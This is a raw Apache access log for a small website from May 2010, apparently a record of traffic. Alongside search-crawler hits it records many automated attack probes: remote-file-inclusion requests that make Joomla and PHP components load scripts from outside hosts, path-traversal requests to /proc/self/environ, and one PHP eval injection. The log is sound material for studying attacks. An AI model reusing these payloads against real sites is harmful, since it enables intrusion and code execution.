208.80.193.38 - - [12/May/2010:22:16:23 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={48E2A6AB-2F5C-40e7-AB4C-1A1031BF25E0}; SIMBAR=0; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; ZangoToolbar 4.8.3)" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:22:23:58 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:22:26:46 -0700] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:22:26:47 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:22:26:47 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:22:34:28 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:22:48:55 -0700] "GET /logs/access_100130.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:22:48:55 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:22:48:56 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
95.108.150.235 - - [13/May/2010:01:01:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [13/May/2010:01:01:24 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [13/May/2010:01:01:25 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [13/May/2010:01:01:26 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [13/May/2010:01:01:27 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [13/May/2010:01:01:28 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
67.195.115.87 - - [13/May/2010:05:13:06 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [13/May/2010:05:13:06 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [13/May/2010:09:35:10 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
208.80.193.40 - - [13/May/2010:09:46:34 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={DA846BDB-2C89-4493-9D50-CAB409377F7C}; FunWebProducts; .NET CLR 1.1.4322)" "virtualsupplynet.com"
207.44.228.84 - - [13/May/2010:10:04:46 -0700] "GET /logs/access_091212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
207.44.228.84 - - [13/May/2010:10:04:47 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
207.44.228.84 - - [13/May/2010:10:04:47 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
92.240.42.10 - - [13/May/2010:10:08:03 -0700] "GET /logs/access_091205.log//squirrelcart/cart_content.php?cart_isp_root=http://www.apatar.com/modules/readme.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
92.240.42.10 - - [13/May/2010:10:08:03 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.apatar.com/modules/readme.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
92.240.42.10 - - [13/May/2010:10:08:04 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
115.124.98.109 - - [13/May/2010:10:38:26 -0700] "GET /logs/access_100102.log//myevent.php?myevent_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.virtualsupplynet.com"
115.124.98.109 - - [13/May/2010:10:38:26 -0700] "GET /myevent.php?myevent_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.virtualsupplynet.com"
115.124.98.109 - - [13/May/2010:10:38:26 -0700] "GET /logs//myevent.php?myevent_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.virtualsupplynet.com"
67.195.115.87 - - [13/May/2010:10:50:09 -0700] "GET /logs/scripts.log HTTP/1.0" 200 1192 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [13/May/2010:14:10:20 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
88.250.57.232 - - [13/May/2010:14:12:56 -0700] "GET /logs/access_100512.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [13/May/2010:14:12:57 -0700] "GET /logs/access_100513.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
211.189.18.242 - - [13/May/2010:14:28:57 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [13/May/2010:14:28:57 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [13/May/2010:14:38:26 -0700] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [13/May/2010:14:38:26 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [13/May/2010:14:38:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [13/May/2010:14:38:28 -0700] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [13/May/2010:14:38:29 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [13/May/2010:14:38:29 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
67.195.110.174 - - [13/May/2010:16:26:00 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [13/May/2010:16:26:00 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [13/May/2010:21:10:43 -0700] "GET /logs/?M=A HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:02:54 -0700] "GET /logs//index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:02:54 -0700] "GET /index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:03:01 -0700] "GET /logs//index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:03:01 -0700] "GET /index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:03:02 -0700] "GET /index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:03:02 -0700] "GET /index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:23:32 -0700] "GET /logs/access_100206.log//index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:23:32 -0700] "GET /index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:23:33 -0700] "GET /logs//index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:24:05 -0700] "GET /logs/access_100206.log//index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:24:06 -0700] "GET /index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
198.170.141.58 - - [13/May/2010:22:24:06 -0700] "GET /logs//index.php?option=com_x-shop&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
67.195.115.87 - - [13/May/2010:22:32:31 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [13/May/2010:22:32:31 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
66.249.65.44 - - [14/May/2010:00:25:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
212.241.177.123 - - [14/May/2010:01:23:17 -0700] "GET /administrator/components/com_virtuemart/hacker.newbie.php?mosConfig.absolute_path=http://nic.bupt.edu.cn/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
212.241.177.123 - - [14/May/2010:01:23:17 -0700] "GET /logs/access_100130.log%20%20//administrator/components/com_virtuemart/hacker.newbie.php?mosConfig.absolute_path=http://nic.bupt.edu.cn/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
212.241.177.123 - - [14/May/2010:01:23:17 -0700] "GET /logs//administrator/components/com_virtuemart/hacker.newbie.php?mosConfig.absolute_path=http://nic.bupt.edu.cn/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
78.137.163.133 - - [14/May/2010:01:37:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
78.137.163.133 - - [14/May/2010:01:37:45 -0700] "GET /logs/access_090912.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.virtualsupplynet.com"
66.249.65.20 - - [14/May/2010:01:49:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
66.249.65.10 - - [14/May/2010:01:49:32 -0700] "GET /logs/access_091107.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
81.80.122.44 - - [14/May/2010:02:09:25 -0700] "GET /logs/access_100116.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
81.80.122.44 - - [14/May/2010:02:09:25 -0700] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
81.80.122.44 - - [14/May/2010:02:09:25 -0700] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
92.241.190.214 - - [14/May/2010:02:55:10 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://bedragon.mobi/.logs??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
92.241.190.214 - - [14/May/2010:02:55:10 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://bedragon.mobi/.logs??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
92.241.190.214 - - [14/May/2010:02:55:10 -0700] "GET /logs/access_100130.log/joomla/index.php?option=com_restaurante&task=http://bedragon.mobi/.logs??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
211.245.21.109 - - [14/May/2010:03:30:04 -0700] "GET /index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
174.133.173.34 - - [14/May/2010:03:40:49 -0700] "GET /index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
211.245.21.109 - - [14/May/2010:03:44:18 -0700] "GET /logs/access_100130.log//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
211.245.21.109 - - [14/May/2010:03:44:19 -0700] "GET /index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
211.245.21.109 - - [14/May/2010:03:44:21 -0700] "GET /logs//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
174.133.173.34 - - [14/May/2010:03:49:08 -0700] "GET /logs/access_100130.log//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
174.133.173.34 - - [14/May/2010:03:49:08 -0700] "GET /index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
174.133.173.34 - - [14/May/2010:03:49:09 -0700] "GET /logs//index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
208.80.193.35 - - [14/May/2010:05:49:58 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; ZangoToolbar 4.8.2; yplus 4.1.00b)" "www.virtualsupplynet.com"
95.108.142.138 - - [14/May/2010:08:12:10 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [14/May/2010:08:12:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [14/May/2010:08:12:12 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [14/May/2010:08:12:13 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [14/May/2010:08:12:14 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [14/May/2010:08:12:15 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
59.21.247.137 - - [14/May/2010:09:42:43 -0700] "GET /stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
59.21.247.137 - - [14/May/2010:09:42:43 -0700] "GET /logs//stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
59.21.247.137 - - [14/May/2010:09:42:43 -0700] "GET /logs/access_100130.log%20%20//stubjambo.php?baseDir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.195.110.174 - - [14/May/2010:10:05:26 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [14/May/2010:10:05:26 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
211.174.62.150 - - [14/May/2010:12:00:02 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.62.150 - - [14/May/2010:12:00:02 -0700] "GET /logs/access_100130.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.62.150 - - [14/May/2010:12:00:02 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.62.150 - - [14/May/2010:12:00:07 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.62.150 - - [14/May/2010:12:00:07 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.62.150 - - [14/May/2010:12:00:07 -0700] "GET /logs/access_100130.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
174.121.67.233 - - [14/May/2010:13:35:42 -0700] "GET /logs/components/com_moodle/moodle.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
174.121.67.233 - - [14/May/2010:13:35:43 -0700] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
174.121.67.233 - - [14/May/2010:13:35:43 -0700] "GET /logs/components/com_moodle/moodle.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
174.121.67.233 - - [14/May/2010:13:35:43 -0700] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
88.250.57.232 - - [14/May/2010:16:38:42 -0700] "GET /logs/access_100513.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [14/May/2010:16:38:43 -0700] "GET /logs/access_100514.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"